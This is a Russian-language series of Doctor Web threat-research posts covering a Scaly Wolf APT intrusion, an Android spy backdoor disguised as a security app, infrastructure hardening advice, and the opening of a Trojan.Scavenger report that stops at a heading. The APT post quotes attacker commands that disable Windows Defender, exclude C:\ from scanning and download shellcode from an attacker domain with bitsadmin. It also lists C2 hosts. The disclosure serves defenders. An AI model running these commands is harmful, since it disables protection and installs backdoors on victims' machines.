В PDF-приманках говорилось, что поступивший «финансовый документ» якобы находится в прикрепленном архиве, и для его распаковки необходимо использовать указанный в тексте пароль. Оформление самих фишинговых PDF-файлов при этом могло быть различным. Некоторые были минималистичными:

Другие — максимально приближены к официальным:

Располагавшийся в архиве файл на самом деле являлся исполняемым, но злоумышленники замаскировали его под PDF-документ. Для этого они присвоили ему «двойное» расширение (Акт Сверки.pdf.exe). Поскольку ОС Windows по умолчанию скрывает расширения для удобства пользователей, потенциальная жертва не видит последнее из них — настоящее — и ошибочно воспринимает файл как безобидный.

Первый образец такого вредоносного письма поступил в антивирусную лабораторию «Доктор Веб» 6 мая 2025 года, после чего в вирусную базу была добавлена запись для детектирования трояна Trojan.Updatar.1. Эта вредоносная программа является начальной ступенью заражения модульным бэкдором Updatar и предназначена для загрузки в целевую систему других компонентов в цепочке. Бэкдор используется для получения конфиденциальных данных с заражаемых компьютеров.

Стоит отметить, что Trojan.Updatar.1 не является новым вредоносным ПО. Первый его образец попал в поле зрения наших специалистов еще год назад, однако нам не удавалось получить загружаемые им ступени, поскольку те скачиваются с C2-сервера не автоматически, а непосредственно по команде операторов сервера. Таким образом, расследование активной атаки с применением этого загрузчика позволило успешно отследить недостающие части бэкдора.

Изучение новой версии Trojan.Updatar.1 показало, что за прошедшее с момента обнаружения время он претерпел незначительные функциональные изменения, однако приобрел уникальную обфускацию, призванную затруднить его анализ. Вирусные аналитики «Доктор Веб» назвали ее RockYou Obfuscation. Ее суть заключается в том, что в теле трояна постоянно инициализируются строчки из словаря RockYou.txt. C ними происходят различные операции, которые никак не влияют на основную функциональность программы. При этом строчки, которые непосредственно относятся к работе приложения, закодированы с помощью операции XOR и небольшого смещения. Ключ для смещения и операции XOR является случайным для каждого образца Trojan.Updatar.1.

RockYou.txt — это список популярных паролей, насчитывающий свыше 30 миллионов позиций. Он был создан в результате крупной утечки конфиденциальных данных. Используется как специалистами по информационной безопасности для тестирования надежности защиты компьютерных систем, так и злоумышленниками для взлома учетных записей.

Пример обфускации, примененной в трояне, и соответствующая вырезка из словаря RockYou:

Хронология атаки представлена на следующей схеме:

Атака на первый компьютер

Заражение первого компьютера предприятия в рамках рассматриваемой целевой атаки произошло 12 мая 2025 года — спустя почти неделю после внесения в нашу вирусную базу выявленной модификации Trojan.Updatar.1. Причина заражения оказалась простой: на целевой машине не был установлен антивирус Dr.Web. В результате троян, поступивший в одном из нежелательных писем, беспрепятственно запустился при открытии «документа» пользователем. Спустя час после заражения троян загрузил и установил в систему другие компоненты бэкдора — Trojan.Updatar.2 и Trojan.Updatar.3.

14 мая с помощью Trojan.Updatar.3 атакующие установили на компьютер задачу для службы BITS на скачивание shell.exe — программы, содержащей шеллкод для загрузки основного тела утилиты Meterpreter. Последняя представляет собой утилиту-бэкдор, входящую в набор Metasploit для тестирования безопасности компьютерных систем.

Далее в систему был установлен один из модулей Trojan.Updatar.3 (FileManager.exe), который отвечает за выгрузку и загрузку файлов на компьютер. С его помощью злоумышленники выполняли кражу файлов из инфицированной системы.

Затем атакующие при помощи утилиты Tool.HandleKatz, предназначенной для дампа системного процесса LSASS, получили учетные данные пользователя Windows. Затем они установили утилиту RDP Wrapper (Program.Rdpwrap.7) для более удобного входа в систему через удаленный рабочий стол (RDP или Remote Desktop Protocol). Кроме того, на компьютер жертвы были установлены утилиты для туннелирования трафика Tool.Chisel и Tool.Frp.

Атака на второй компьютер

Компрометация второго компьютера началась 14 мая 2025 года. Атакующие использовали учетные данные, похищенные из памяти первого зараженного устройства, для доступа в сеть предприятия. Они дистанционно выполняли команды на целевой системе, чтобы определить, заслуживает ли второй компьютер внимания с точки зрения дальнейшего внедрения.

Спустя более недели, 23 мая, злоумышленники установили на этот компьютер задачу для службы BITS на скачивание Trojan.Updatar.1. Однако поскольку в системе присутствовал антивирус Dr.Web, он блокировал запуск трояна.

29 мая они снова использовали сеть предприятия для удаленного доступа к устройству и в ручном режиме установили на него модули Trojan.Updatar.2 и Trojan.Updatar.3, закрепившись в системе.

3 июня 2025 года с помощью еще одной задачи для службы BITS был установлен бэкдор Meterpreter.

Атака на третий компьютер

Точкой входа в третью систему стало получение злоумышленниками учетных данных пользователя от службы удаленного рабочего стола (RDP). Атакующие подключались к компьютеру через скомпрометированную учетную запись RDP начиная с 23 июня 2025 года. Далее для закрепления в системе и получения доступа к удаленной оболочке (Remote Shell) запускалась одна из стандартных утилит из фреймворка Metasploit. Через нее совершалась попытка исполнить полезную нагрузку в виде PowerShell-скрипта. Однако установленный на компьютере антивирус Dr.Web блокировал это действие, детектируя попытку выполнения как DPC:BAT.Starter.613.

Данный вредоносный скрипт должен был распаковать закодированные с помощью base64 данные, в которых располагался второй PowerShell-скрипт, после чего выполнить его. Второй скрипт содержал закодированный с помощью base64 шеллкод для запуска его в адресном пространстве процесса PowerShell.

Исполнение данной цепочки скриптов должно было запустить загрузчик, который предназначен для скачивания в систему бэкдора Meterpreter с адреса 77[.]105[.]161[.]30.

После того как попытки проникновения через исполнение скриптов были заблокированы антивирусом, злоумышленники отказались от применения стандартных утилит из набора Metasploit и перешли к другой тактике, начав использовать инструмент RemCom. Антивирус Dr.Web детектирует это приложение как Program.RemoteAdmin.877, однако в данном случае оно не было заблокировано, поскольку является стандартной утилитой удаленного администрирования, запуск которых с настройками антивируса по умолчанию разрешен.

С помощью этой утилиты атакующие выполняли следующие команды:


    ipconfig
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    powershell  -Command "Add-MpPreference -ExclusionPath 'C:\'"
    powershell  -Command "Get-MpPreference | Select -ExpandProperty ExclusionPath"
    powershell  -Command "Set-MpPreference -MAPSReporting 0"
    tasklist
    reg  add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    powershell  -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
    chcp
    wmic  service where "name='DrWebAVService'" get PathName
    reg  query "HKLM\SOFTWARE\DrWeb" /v Version
    wmic  product where "name like 'DrWeb%'" get Name, Version
    sc  qc DrWebAVService
    reg  query "HKLM\SOFTWARE\WOW6432Node\DrWeb" /v Version
    tasklist
    findstr  /i drweb
    findstr  /i dr
    findstr  /i drw
    findstr  /i drs
    findstr  /i dws
    wmic  product where "name like 'Dr.Web%'" get Name, Version
    reg  query "HKLM\SOFTWARE\WOW6432Node\Dws" /v Version
    netstat  -a -o -n
    powershell  -Command "bitsadmin /transfer "DownloadJob" "hxxps[:]//roscosmosmeet[.]online/shellcode.exe" "$env:USERPROFILE\Pictures\zabix.exe""
    
    
    powershell  -Command "Get-MpComputerStatus"
    powershell  -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"
    tasklist
    findstr  /i drweb
    sc  query
    findstr  /i drweb
    cmd: installer.exe

Они пытались идентифицировать установленное на компьютере антивирусное ПО, а также установить несколько точек закрепления в системе:

shellcode.exe — одна из вариаций Meterpreter (BackDoor.Shell.244), в которой шеллкодом скачивается основное тело Meterpreter;
installer.exe — Trojan.Updatar.1.

Все эти попытки также обнаруживались и блокировались антивирусом Dr.Web.

Особенность ВПО и инфраструктуры злоумышленников

Для управления вредоносными программами, задействованными в этой целевой атаке, использовалось множество C2-серверов. Однако основным источником загрузки ВПО был домен roscosmosmeet[.]online.
Все вариации утилиты-бэкдора Meterpreter были привязаны к IP-адресу 77[.]105[.]161[.]30 и обращались к различным портам.
Все модификации модуля Trojan.Updatar.3 для связи использовали домен updating-services[.]com.

Модули Trojan.Updatar.1 и Trojan.Updatar.2 в зависимости от версии использовали домены adobe-updater[.]net и updatingservices[.]net.

Кто стоит за атакой

Благодаря артефактам, обнаруженным в различных образцах ВПО, мы с полной уверенностью можем идентифицировать APT-группировку, ответственную за рассмотренную атаку. Эти артефакты были найдены:

в модификациях модуля Trojan.Updatar.3;
в программах-подделках, выявленных при анализе сетевой инфраструктуры злоумышленников, но не задействованных в текущей кампании.

Кроме того, они встречались в одной из вредоносных программ, использованных в рамках другой целевой атаки на это же предприятие.

Все эти артефакты указывают на то, что данные вредоносные инструменты создавал один и тот же разработчик. Он имеет непосредственное отношение к группировке Scaly Wolf.

Как и два года назад, группировка Scaly Wolf использовала самостоятельно написанный модульный бэкдор для закрепления в системе и проведения в ней разведки. Но в отличие от предыдущей атаки, в текущей кампании злоумышленники не применяли MaaS-троян (Malware-as-a-Service, вредоносное ПО как услуга) для первоначального доступа к целевым компьютерам.

Также злоумышленники стали применять стандартные средства постэксплуатации и закрепления в системе:

различные утилиты с открытым исходным кодом для туннелирования трафика;
фреймворк Metasploit;
различные программы для удаленного доступа к ПК.

Другой особенностью является то, что данная группировка отправляет письма с вредоносным ПО с email-адресов, зарегистрированных в почтовом сервисе Mail.ru.

Инструменты злоумышленников

Как мы отметили ранее, при анализе сетевой инфраструктуры бэкдора Updatar наши специалисты выявили ряд вредоносных программ-подделок. Вместе с ними также были обнаружены и трояны Trojan.Uploader.36875 и BackDoor.Siggen2.5423. Они не использовались в рассмотренной атаке, но могли быть задействованы в других кампаниях Scaly Wolf.

Так, Trojan.Uploader.36875 предназначен для отправки файлов с инфицированных компьютеров на сервер злоумышленников. BackDoor.Siggen2.5423 позволяет дистанционно управлять компьютерами через VNC. В свою очередь, программы-подделки демонстрируют окна с различными сообщениями, которые вводят потенциальных жертв в заблуждение. Эти подделки не несут непосредственной угрозы компьютерам, но могут помочь злоумышленникам проводить атаки. Примеры демонстрируемых ими поддельных окон представлены ниже.

Поддельное сообщение об удалении защитного ПО:

Поддельное сообщение от встроенного в Windows антивируса о выполненном сканировании и удалении угроз:

Поддельное сообщение о необходимости применения неких системных настроек «для сохранения стабильности Windows»:

На самом деле подделка получает аргумент команды и после того как пользователь нажимает кнопку подтверждения в окне с сообщением, запускает заданное приложение.

Список утилит и ВПО, используемых группировкой Scaly Wolf:

Trojan.Updatar.1
Trojan.Updatar.2
Trojan.Updatar.3
Trojan.Uploader.36875
BackDoor.Siggen2.5423
BackDoor.Shell.244 (Meterpreter)
BackDoor.Meterpreter.259
Program.RemoteAdmin.877 (RemCos)
Tool.HandleKatz
Tool.Chisel
Tool.Frp

Подробные технические описания бэкдора Updatar и его компонентов находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.Updatar.1
Подробнее о Trojan.Updatar.2
Подробнее о Trojan.Updatar.3
Подробнее о Trojan.Uploader.36875
Подробнее о BackDoor.Siggen2.5423

Заключение

Таргетированные атаки остаются одной из серьезных угроз информационной безопасности для компаний. Рассмотренный случай показал, что злоумышленники проявляют гибкость и изобретательность в попытках получить доступ к информационным системам. Хакеры могут использовать различные векторы для проникновения: фишинговые рассылки, эксплуатацию уязвимостей, заражение незащищенных антивирусом машин и даже ПО, которое антивирусы по умолчанию разрешают запускать — например, утилиты удаленного администрирования.

Поэтому даже если на компьютерах предприятия установлены защитные решения, атакующие могут пытаться обойти их. Чтобы обеспечить более надежную защиту устройств, мы рекомендуем всегда тщательно настраивать средства антивирусной защиты для корпоративных машин и не оставлять их настройки по умолчанию. Кроме того, необходимо устанавливать все имеющиеся обновления операционной системы и прикладного ПО, чтобы минимизировать риски заражения через эксплуатацию уязвимостей.

Матрица MITRE

Первоначальный доступ	Фишинг (T1566)
Закрепление	BITS-задачи (T1197) Модификация реестра (T1112) Выполнение при старте системы (T1547)
Предотвращение обнаружения	Обфусцированные файлы или данные (T1027)
Сбор данных	Данные из локальной системы (T1005) Запись экрана (T1113)
Организация управления	Веб-протоколы (T1437.001) Зашифрованный канал (T1573)

Индикаторы компрометации

Android-бэкдор шпионит за сотрудниками российского бизнеса

Tue, 12 Aug 2025 12:53:18 GMT

12 августа 2025 года

Компания «Доктор Веб» сообщает о распространении многофункционального бэкдора Android.Backdoor.916.origin для мобильных Android-устройств, который атакует представителей российского бизнеса. Вредоносная программа способна выполнять множество команд злоумышленников и обладает обширными возможностями для слежки и кражи данных. Среди прочего она может прослушивать разговоры, передавать трансляцию с камеры, похищать содержимое из мессенджеров и браузеров, а также имеет функциональность кейлоггера для перехвата вводимого текста, включая пароли.

Первые версии бэкдора Android.Backdoor.916.origin появились в январе 2025 года. С момента обнаружения антивирусная лаборатория «Доктор Веб» наблюдала за эволюцией этого ВПО и выявила ряд его версий (информация о них представлена в соответствующих индикаторах компрометации). Эксперты нашей компании полагают, что Android.Backdoor.916.origin скорее предназначен для использования в точечных атаках, чем для массового распространения среди владельцев Android-устройств. Основной его целью стали представители российского бизнеса.

Злоумышленники через личные сообщения в мессенджерах распространяют APK-файл бэкдора под видом антивируса с названием «GuardCB». Приложение имеет значок, напоминающий эмблему Центрального Банка Российской Федерации на фоне щита. При этом в его интерфейсе предусмотрен только один язык — русский. То есть вредоносная программа целиком ориентирована на российских пользователей. Это подтверждается и другими выявленными модификациями с такими именами файлов как «SECURITY_FSB», «ФСБ» и другими, которые киберпреступники пытаются выдать за защитные программы, якобы имеющие отношение к российским правоохранительным органам.

Значки вредоносного приложения вводят потенциальных жертв в заблуждение

Никаких защитных функций в программе на самом деле нет. В процессе работы Android.Backdoor.916.origin имитирует антивирусное сканирование устройства, при этом вероятность «обнаружения» угроз в нем запрограммирована. Чем больше времени проходит с момента последнего «сканирования», тем она выше, но не более 30%. Количество якобы выявленных угроз определяется случайным образом и составляет от 1 до 3.

При первом запуске Android.Backdoor.916.origin запрашивает доступ ко множеству системных разрешений:

к геолокации;
к записи аудио;
к СМС, контактам, списку звонков, медиафайлам, разрешение на выполнение звонков;
к камере (создание фотографий и запись видео);
к разрешению на работу в фоновом режиме;
к правам администратора устройства;
к специальным возможностям (Accessibility Service).

Примеры запрашиваемых разрешений

Далее вредоносная программа запускает несколько собственных сервисов и ежеминутно проверяет их активность, при необходимости запуская вновь. Через них бэкдор подключается к C2-серверу и получает от него множество различных команд. Среди них:

отправить на сервер входящие и исходящие СМС-сообщения;
отправить на сервер список контактов;
отправить на сервер список телефонных вызовов;
отправить на сервер данные геолокации;
начать или остановить потоковую трансляцию звука с микрофона устройства;
начать или остановить потоковую трансляцию видео с камеры устройства;
начать или остановить трансляцию с экрана устройства;
отправить на сервер все изображения, которые хранятся на карте памяти;
отправить на сервер изображения с карты памяти по заданному диапазону имен;
отправить на сервер заданное изображение с карты памяти;
включить или отключить самозащиту бэкдора;
выполнить полученную shell-команду;
отправить на сервер информацию о сети и интерфейсах устройства.

Трансляция разных типов данных, получаемых бэкдором, выполняется на отдельные порты управляющего сервера.

Android.Backdoor.916.origin использует службу специальных возможностей (Accessibility Service) для реализации функциональности кейлоггера и перехвата содержимого из мессенджеров и браузеров. Троян отслеживает следующие программы:

Telegram
Google Chrome
Gmail
Яндекс Старт
Яндекс Браузер
WhatsApp

Если от злоумышленников поступает соответствующая команда, бэкдор также использует службу специальных возможностей для защиты себя от удаления.

В Android.Backdoor.916.origin предусмотрена возможность работы с большим числом управляющих серверов, информация о которых расположена в его конфигурации. Кроме того, в нем предусмотрена возможность переключения между хостинг-провайдерами, число которых доходит до 15, однако в настоящее время такая функциональность не задействована. Антивирусная лаборатория «Доктор Веб» уведомила регистраторов доменов о соответствующих нарушениях.

Антивирус Dr.Web для мобильных устройств Android успешно обнаруживает и удаляет все известные модификации Android.Backdoor.916.origin, поэтому для наших пользователей он опасности не представляет.

Подробнее об Android.Backdoor.916.origin

Индикаторы компрометации

Практические рекомендации по усилению безопасности ИТ-инфраструктуры

Fri, 08 Aug 2025 13:00:00 GMT

08 августа 2025 года

Средства массовой информации почти ежедневно сообщают о кибератаках на российские организации.

Зачастую атаки злоумышленников сопровождаются не только кражей важных коммерческих данных, но и их последующим шифрованием, чтобы нанести максимальный вред компании.

Статистика «Доктор Веб»

С каждым годом все меньше случаев, когда удается криптоаналитическими методами подобрать ключ шифрования в случае инцидента с шифровальщиком. По нашей статистике, расшифровке поддаются около 1-2% случаев, с которыми к нам обращаются. Злоумышленники совершенствуют схемы и методы шифрования, используют исключительно надежные и криптостойкие алгоритмы. Как следствие, файлы становится невозможно расшифровать без получения уникальных криптостойких ключей, не поддающихся перебору за разумные периоды времени.

Иногда зашифрованные данные невозможно расшифровать в принципе. Происходит это по абсолютно разным причинам. Например, злоумышленники могут допускать ошибки в алгоритме шифрования или в коде своих изделий, как результат — при шифровании файлы повреждаются или даже стираются. Другой вариант: хакеры просто не выходят на связь, и становится невозможным получить ключ расшифровки. Нередки случаи, когда ключ удается выкупить у злоумышленников, но он не подходит для расшифровки или подходит только для части данных, тем временем сами вирусописатели перестают выходить на связь.

Напрашивается вывод: если данные уже зашифрованы преступником, то с высокой долей вероятности они потеряны безвозвратно, даже если пострадавший согласится заплатить выкуп. Нельзя забывать, что целью некоторых известных группировок является преднамеренное повреждение данных, а не вымогательство и получение за них выкупа. Необходимо принять меры к защите корпоративной сети от проникновения злоумышленников, меры для своевременного обнаружения такого вторжения, меры, препятствующие выполнению злоумышленником вредоносных действий. Они должны быть дополнены мерами, направленными на минимизацию нанесенного ущерба и быстрое восстановление информационной системы после подобного инцидента. Иными словами, необходимо со всей возможной тщательностью застраховаться на случай подобного киберинцидента.

По нашей статистике, наиболее частый и распространенный вектор атаки — несанкционированное получение удаленного доступа – причем последний может быть не только с помощью RDP, но и VNC или программы для удаленного управления (например, RAdmin, Ammyy Admin и пр.). Возможны разные способы получения этого доступа. Самый распространенный — это банальный подбор пароля или его утечка (через подкуп сотрудника, фишинг, намеренный саботаж или халатность). Реже встречается использование уязвимостей ОС или критичного софта, содержащего данные уязвимости (MS Exchange, MS SQL Server и т.д.). Еще реже — банальное скачивание вируса из внешней сети, в том числе через почтовый фишинг или другое несознательное действие.

Также следует иметь в виду, что многократное использование одинакового пароля для разных сервисов означает, что в случае его утечки компрометации подвергаются сразу все сервисы, где он используется. Именно с попыток перебора таких скомпрометированных паролей нередко начинаются сценарии проникновения злоумышленников в периметр организации. Иными словами, каждый используемый пароль должен быть уникальным: применяться только в одном сервисе и нигде более.

Особняком стоят целевые атаки на предприятия, когда могут применяться все вышеперечисленные методы вместе взятые. Иногда для целевой атаки на одну компанию злоумышленники совершают несанкционированный удаленный доступ в сеть других компаний, например, дочерней организации, поставщика услуг или партнера. Такой «заход» нужен, чтобы обеспечить доверие, а затем успешно осуществить фишинговую атаку и получить точку входа. В таких случаях само по себе заражение или шифрование — не самоцель. Злоумышленникам достаточно разместить в системе цели некий уязвимый драйвер или библиотеку, так называемую «закладку», через которую они впоследствии удаленно смогут получать интересующую информацию о сети компании, а также распространять своё влияние глубже. В таком режиме хакеры могут незамеченными находиться в сети предприятия месяцами или годами и не вести никакой явной вирусной деятельности. Однако, любой серьезный анализ или аудит критичных систем в этот период с большой степенью вероятности покажет присутствие незваных гостей.

На основе многолетнего опыта работы нашей службы технической поддержки и департамента по расшифровке файлов, мы разработали рекомендации для усиления безопасности ИТ-инфраструктуры на предприятиях.

Общие рекомендации

Скачать PDF

Главное: принципиально — провести аудит всей системы и определить основные критичные точки, без защиты которых компания не сможет существовать, а затем — сконцентрироваться на них в первую очередь.

Проведите ревизию учетных записей (УЗ) вашей сети. Заблокируйте все неиспользуемые УЗ. Для всех используемых административных УЗ поменяйте пароли или убедитесь, что установлен надежный пароль.
- Важно обеспечить сложность пароля. Главные требования к паролям всем известны: длина не менее 8 символов, с обязательным использованием букв разного регистра, цифр и специальных символов.
- Архиважно: пароль должен быть уникальным. Ни в коем случае он не должен был использоваться где-либо ранее: на сторонних сайтах или сервисах. Пользователи склонны использовать устоявшиеся пароли, но при этом не отслеживают своевременно все возможные утечки баз данных с паролями. Больше того, об этих утечках не всегда известно. А они происходят регулярно. Любой вполне надежный пароль, установленный пользователем на стороннем сервисе несколько месяцев назад, вполне может оказаться в одной из свежих украденных баз данных, что позволит злоумышленникам получить удаленный доступ. Вывод прост: лучше забыть и восстановить пароль, нежели подвергнуть компрометации всю сеть предприятия.
- Также может быть полезно использовать сервисы вроде Have I Been Pwned, если это не противоречит политике безопасности компании. Применение таких сервисов позволит выявлять случаи утечек паролей пользователей.
Проверьте степень защищенности доступа по протоколу RDP (Remote Desktop Protocol, протокол удалённого рабочего стола) или другого программного обеспечения для удаленного доступа (если они используются). На сегодня при наличии установленного и работающего в системе антивируса случаи шифрования файлов практически не встречаются. Самая распространенная схема — компрометация удаленного доступа, получение повышенных привилегий в системе, удаление антивируса или его отключение, за которыми следует запуск вспомогательных утилит и шифровальщика. То есть, речь идет о комплексных атаках с использованием различных техник.

Если в вашей организации используется RDP, то доступ к нему должен быть надежно защищен. Все учетные записи, которые используются для подключения, должны быть под контролем. В обязательном порядке они должны иметь длинный, уникальный и сложный пароль, который невозможно подобрать ни простым перебором, ни перебором по словарям. Все неактуальные учетные записи должны быть отключены.

Если это возможно, дополнительно RDP (а равно VNC и прочие способы удаленного подключения) канал стоит скрыть за VPN. Если это невозможно, то на внешнем оборудовании — роутере или шлюзе — необходимо настроить ограничение на удаленное подключение, оставив возможность подключаться удаленно только с определенных IP или подсетей. Также стоит рассмотреть лучшие практики по защите средств удаленного доступа от несанкционированного подключения. Включение и просмотр аудита удаленных подключений, ограничение числа подключений при неудачном вводе пароля более определенного числа раз и замена стандартного порта заметно осложнят злоумышленникам процесс и заметно снизят вероятность успешного входа.

Нужно осознавать: при компрометации удаленного доступа система практически обречена. И ни один антивирус уже не сможет полноценно защитить систему и сеть предприятия от последствий. При инцидентах такого рода злоумышленники чаще всего удаляют антивирус или выводят его из строя. Но иногда хакеры могут не использовать никаких вредоносных утилит, чтобы похитить и затем зашифровать данные. В этом случае им не придется удалять антивирус, так как невозможно будет отличить злонамеренные действия от действий легитимного администратора. Нередки случаи, когда при подобных инцидентах файлы либо упаковываются в обычные архивы с длинным неизвестным паролем, либо скачиваются на внешние серверы, а оригиналы из системы полностью удаляются. Также для шифрования могут использоваться системные средства, такие, как Windows Bitlocker. В последнем случае никаких вредоносных действий относительно системы и антивируса не выполняется в принципе, только стандартные пользовательские или административные операции. Еще один вывод: к обеспечению информационной безопасности компании необходимо подходить комплексно.
Проверьте настройку удаленного доступа к серверам Linux и выполните основные рекомендации по настройкам SSHD:
- Запретите использование входа по паролю — применяйте только SSH ключи, сами ключи при этом защищайте паролем (В принципе, ключ можно сохранить без пароля и подключаться по нему далее без пароля. Но мы не рекомендуем этот способ). Ключи лучше хранить на внешнем носителе информации и подключать к компьютеру по необходимости.
- Запретите возможность непосредственного входа по SSH под учетной записью root. При необходимости повышения привилегий в пользовательской сессии используйте sudo.
- Ограничьте перечень пользователей, имеющих право подключения по SSH.
- На уровне системного межсетевого экрана установите — по умолчанию — для всех подключений политику на отклонение входящих подключений. Избранные порты должны быть открыты для подключений только в случае необходимости. Разрешить для подключений из общей сети только публичные сервисы (например, http/https, smtp). Чувствительные сервисы (например, SSH) нужно ограничивать подключениями через VPN.
- Для любых сервисов типа СУБД (mysql, postresql, redis, mongodb и т.п.) исключите возможность подключения с внешних адресов. Эти подключения должны осуществляться строго с доверенных адресов (локальная сеть или VPN).
- Избегайте настроек сервисов, открывающих входящие подключения на интерфейсе 0.0.0.0. Это допустимо только для публичных сервисов, для всех иных должен использоваться непубличный интерфейс (локальная сеть или VPN).
- Включите аудит действий пользователей (auditd) и настройте уведомление об активности root или sudo — например, через отправку на электронную почту.
- Ограничьте возможность выполнения скриптов в /tmp и других временных каталогов через параметры монтирования noexec, nosuid, nodev – однако следует помнить, что такие ограничения могут оказать влияние на легитимные процессы (например, установщики прикладного ПО), поэтому нужно быть внимательным при применении данной рекомендации.
- Разнесите системные каталоги по разным разделам (/var, /home, /tmp) для ограничения последствий при их переполнении.
- Удалите все неиспользуемые сервисы, установленные из шаблона ОС (telnet, ftp, rsh, nfs и т.д.). Ненужные службы, которые не удалены, отключите (systemctl disable или иным аналогичным способом).
- Ограничьте использование sudo только разрешенными пользователями (настройкой sudoers).
- Рассмотрите возможность использования дополнительных методов аутентификации по SSH, таких, как Google Authenticator или аналоги. Любой 2FA метод многократно снизит риск несанкционированного подключения.
Проверьте саму систему и критичное ПО на известные уязвимости. По возможности используйте наиболее актуальные сборки операционной системы (ОС) и прикладного ПО. Установите все последние обновления к ним.

Эксплойты операционной системы и широко распространенного софта могут являться лазейкой для получения доступа к системе в обход любых методов защиты. Чем старее парк используемых ОС, тем выше риск компрометации. Для современных ОС, в первую очередь, всегда должно быть включено автоматическое обновление. Но главное: это обновление должно на деле проводиться. Это касается любого критичного софта, как, например, различных СУБД, почтовых серверов и клиентов, ПО для проектирования, моделирования, или любого другого. Обновления должны быть плановыми и систематическими, чтобы выход очередной 0-day уязвимости не застал пользователей врасплох и не стал причиной компрометации всей сети в обход любого антивирусного ПО.
Защитите антивирус от удаления и обновите его до актуальной версии.

Антивирусное ПО должно быть установлено на всех машинах сети. Сегодня практически не встречаются случаи, когда при установлении антивируса вместе с ним в систему был успешно занесен и запущен троян-шифровальщик. Первое, что делают злоумышленники при удаленном проникновении в систему – пытаются отключить, удалить или иначе вывести из строя любое антивирусное ПО. Везде, где это возможно, необходимо установить запрет на удаление антивируса локально (если используется версия антивируса Dr.Web с централизованным управлением), запрет на отключение самозащиты (также если используется версия антивируса Dr.Web с централизованным управлением) и пароль для доступа к его настройкам. В случае компрометации удаленного подключения такие ограничения повышают шансы успешно защититься и осложняют задачу злоумышленникам, давая администраторам время среагировать на атаку.

Любая рабочая станция без антивируса или с антивирусом, в котором не обновляются компоненты и базы, создает опасность для всей остальной сети. Особенно, если эта машина доступна из внешней сети.

При использовании централизованных версий антивируса Dr.Web под Windows так же рекомендуется рассмотреть возможность использования Контроля приложений, входящего в состав центра управления Dr.Web и антивирусных агентов, начиная с 12 версии. При корректной настройке, в системе в принципе невозможен будет запуск любых действий не авторизованных администратором.
Регламентируйте проведение процедуры регулярного резервного копирования (бэкапа). Это наиважнейший принцип защиты. Правильно организованная система резервного копирования является основным средством защиты как от шифровальщиков, так и от других проблем, связанных с повреждением данных и выходом оборудования из строя. Серьезная ошибка, которую допускают многие администраторы в реальных инцидентах — хранение резервных копий в той же сети или системе, в которой эти копии создаются. Недостаточно просто сделать резервную копию одной системы на некоем соседнем сервере, без дополнительных манипуляций. При киберинциденте, и, в частности, при шифровании данных, с высокой степенью вероятностью эти резервные копии окажутся зашифрованными наряду со всеми остальными данными в системе. Именно такое течение инцидентов мы и видим на практике в обращениях пользователей, которые до нас доходят. При шифровании данных, бэкапы в сети — одна из первых целей злоумышленников.

Резервное копирование ценной информации должно выполняться на носители, которые недоступны для записи из основных систем, где хранятся оригиналы. Ни с одной рабочей станции в сети не должно быть одновременного доступа к записи и чтению всех существующих бэкапов. В любой момент времени должно существовать хотя бы две, а лучше три резервные копии корпоративных данных, без которых предприятие не сможет функционировать. Как минимум одна из этих копий должна быть полностью изолирована от остальной сети. В план резервного копирования обязательно нужно добавлять периодическую проверку восстановления из резервной копии. То есть, резервная копия не только должна просто существовать, но должна быть целостной, а администраторы должны иметь возможность и практический навык по быстрому восстановлению работоспособности сети из данного бэкапа. При применении такого протокола, во-первых, в критической ситуации персонал будет иметь натренированный опыт данной операции, что заметно сократит период восстановления, а, во-вторых, позволит избежать ситуации, когда ввиду некорректной настройки параметров данные из резервной копии невозможно восстановить.
Мы настоятельно рекомендуем разработать план аварийного восстановления и периодически устраивать учения. Персонал должен иметь инструкции на случай возникновения недопустимых последствий, а руководитель должен быть уверен в том, что этот план жизнеспособен.

Из практики нам известно, что организация полноценной автоматизированной системы резервного копирования может быть сопряжена с рядом трудностей. Однако, нельзя полностью игнорировать эту процедуру, так как добиться результата можно и с использованием минимальных средств. Даже банальное ручное копирование бухгалтерской 1С базы и ряда важных документов на usb-накопитель, пусть даже раз в неделю, многократно снизит возможные финансовые, правовые и репутационные последствия от потери всей совокупности данных.

Геймерам приготовиться: под видом читов и модов мошенники распространяют Trojan.Scavenger для кражи криптовалюты и паролей

Tue, 22 Jul 2025 03:00:00 GMT

Скачать PDF

22 июля 2025 года

Антивирусная лаборатория «Доктор Веб» обнаружила семейство вредоносных программ Trojan.Scavenger, с помощью которых злоумышленники похищают конфиденциальные данные из криптокошельков и менеджеров паролей у пользователей ОС Windows. В заражении компьютеров участвует несколько троянов семейства, при этом для их запуска используются легитимные приложения, в том числе в них эксплуатируются уязвимости класса DLL Search Order Hijacking.

Введение

В 2024 году компания «Доктор Веб» расследовала инцидент информационной безопасности, связанный с попыткой проведения целевой атаки на одно из российских предприятий. Схема атаки включала применение вредоносного ПО, которое для заражения целевой системы эксплуатировало уязвимость к перехвату порядка поиска DLL (DLL Search Order Hijacking) в популярном веб-браузере. При запуске Windows-приложения производят поиск необходимых для работы библиотек в различных хранилищах и в определенной последовательности. Чтобы «обмануть» программы, злоумышленники размещают вредоносные DLL-файлы там, где поиск будет выполняться в первую очередь — например, в каталоге установки целевого ПО. При этом троянским файлам даются имена легитимных библиотек, которые располагаются в менее приоритетных для поиска директориях. В результате уязвимые программы при старте первыми загружают именно вредоносные DLL. Те работают как их составная часть и получают такие же права.

По следам рассмотренного инцидента наши специалисты внедрили в антивирусные продукты Dr.Web функциональность, которая позволяет отслеживать и предотвращать попытки эксплуатации уязвимостей к перехвату порядка поиска DLL. При изучении телеметрии данной функции вирусные аналитики «Доктор Веб» выявили попытки загрузки неизвестного ранее ВПО сразу в несколько браузеров наших клиентов. Изучение этих случаев и позволило обнаружить новую хакерскую кампанию, о которой пойдет речь в настоящем материале.

Заражение компьютеров вредоносными программами Trojan.Scavenger является многоступенчатым и начинается с троянов-загрузчиков, попадающих в целевые системы различными способами. Наши специалисты выявили две цепочки данной кампании с разным числом задействованных троянских компонентов.

Цепочка из трех загрузчиков

